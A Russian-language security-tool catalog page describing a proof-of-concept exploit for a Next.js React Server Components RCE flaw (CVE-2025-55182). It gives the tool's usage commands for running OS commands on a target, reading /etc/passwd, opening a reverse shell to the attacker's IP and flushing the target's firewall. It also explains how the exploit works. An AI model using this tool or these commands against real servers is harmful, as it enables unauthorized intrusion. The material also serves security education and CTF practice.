Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WEB-CLI_RCE_React2Shell — WEB-CLI_RCE_React2Shell is an educational PoC exploit tool for CVE-2025-55182, a critical Prototype Pollution flaw in Next.js applications using React Server Components. Designed for CTFs and research, it features a single-command mode, an interactive web CLI, and reverse shell capabilities to demonstrate RCE. | Kitploit
Инструменты/GitHubGitHub/raivenlockdown/web-cli_rce_react2shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRemote Access Tool

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

GitHub
raivenlockdown/web-cli_rce_react2shell

WEB-CLI_RCE_React2Shell

Репозиторий
52 месяцев назадЕщё не проверено

WEB-CLI_RCE_React2Shell is an educational PoC exploit tool for CVE-2025-55182, a critical Prototype Pollution flaw in Next.js applications using React Server Components. Designed for CTFs and research, it features a single-command mode, an interactive web CLI, and reverse shell capabilities to demonstrate RCE.

Поделиться

REACT2SHELL

🎯 Краткий обзор (Что это такое?)

Этот инструмент — простой эксплойт Proof-of-Concept (PoC) для CVE-2025-55182. Это серьезная уязвимость (Prototype Pollution), обнаруженная в приложениях Next.js, использующих React Server Components.

Если целевой сервер уязвим, этот скрипт позволяет выполнять команды операционной системы на нем (Удаленное выполнение кода, или RCE).

Этот инструмент создан для обучения, CTF-соревнований и ответственных исследований безопасности.

Screenshot 2025-12-12 214115

⚠️ Отказ от ответственности для студентов и участников CTF

ИСПОЛЬЗУЙТЕ ЭТИЧНО. Запускайте этот эксплойт только против систем, которыми вы владеете или на тестирование которых у вас есть явное задокументированное разрешение. Несанкционированное использование незаконно. Этот инструмент предназначен только для образовательных целей.

🌟 Как использовать

Этот инструмент предоставляет три основных способа выполнения команд: простая одиночная команда, полноценная интерактивная веб-консоль и попытка классической обратной оболочки.

⚙️ Установка

  1. Получите код:

    root@kitploit:~
    git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
    cd REACT2SHELL
    
  2. Установите библиотеку:

    root@kitploit:~
    pip install requests
    

Режим 1: Интерактивная веб-консоль (рекомендуется для CTF)

Это самый простой способ взаимодействия с целью. Он запускает локальную веб-страницу на вашей машине, которая действует как терминал.

  1. Запустите скрипт:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> --web-cli
    

    Пример: python3 exploit.py http://target.com/ --web-cli

  2. Откройте браузер: Скрипт сообщит вам открыть http://127.0.0.1:8000/. Затем вы сможете вводить команды (например, ls, whoami, cat /etc/passwd) прямо на веб-странице.

Режим 2: Выполнение одиночной команды

Выполните одну команду и сразу получите вывод в вашем локальном терминале. Полезно для быстрых проверок, например, определения вашего идентификатора пользователя.

root@kitploit:~
python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

Пример: python3 exploit.py http://target.com/ --cmd 'id'

Режим 3: Попытка обратной оболочки

Используйте этот режим, если вам нужно стабильное постоянное соединение. Примечание: Часто не работает в реальных средах из-за брандмауэров (фильтрация исходящего трафика).

  1. Запустите слушатель (например, netcat):

    root@kitploit:~
    nc -lvnp 55555
    
  2. Запустите эксплойт:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
    
    • -i <YOUR_IP>: Ваш IP-адрес.
    • -p 55555: Порт, который использует ваш слушатель.
    • --flush (Необязательно): Пытается сначала выполнить iptables -F на цели, чтобы очистить брандмауэры хоста.

🔬 Техническое объяснение (Как работает эксплойт)

Эксплойт использует уязвимость Prototype Pollution для достижения RCE.

  1. Prototype Pollution: Скрипт отправляет специально сформированную нагрузку на уязвимую конечную точку Next.js. Эта нагрузка эксплуатирует ошибку в том, как сервер обрабатывает данные, позволяя нам добавлять свойства к базовой структуре объектов JavaScript (Object.prototype).
  2. Триггер RCE: Мы загрязняем конкретное внутреннее свойство, которое управляет тем, какой код запускает сервер (используя child_process Node.js). Мы заменяем значение этого свойства нашу команду оболочки.
  3. Захват вывода: При выполнении команд в режиме одиночной команды или веб-CLI эксплойт заставляет сервер выполнить команду (execSync) и сразу же вызвать безвредную ошибку. Вывод команды хитро помещается в поле digest сообщения об ошибке. Затем скрипт Python считывает это поле для получения результатов.

🤝 Ссылки и благодарности

Это исследование опирается на первоначальную работу и раскрытие информации сообществом безопасности. Спасибо всем исследователям и контрибьюторам открытого исходного кода.

📚 Ключевые ссылки

  • Оригинальный репозиторий PoC для CVE-2025-55182 - (Основа этого эксплойта.)
  • Оригинальный пример кода PoC - (Исходный пример кода.)
  • Критическая уязвимость безопасности в React Server Components - (Официальная запись в блоге React по этому вопросу.)
  • Критическая уязвимость в React (CVE-2025-55182) - (Подробный анализ безопасности.)
  • Документация React Server Functions - (Официальная документация, объясняющая контекст работы уязвимых компонентов.)
Скачать инструмент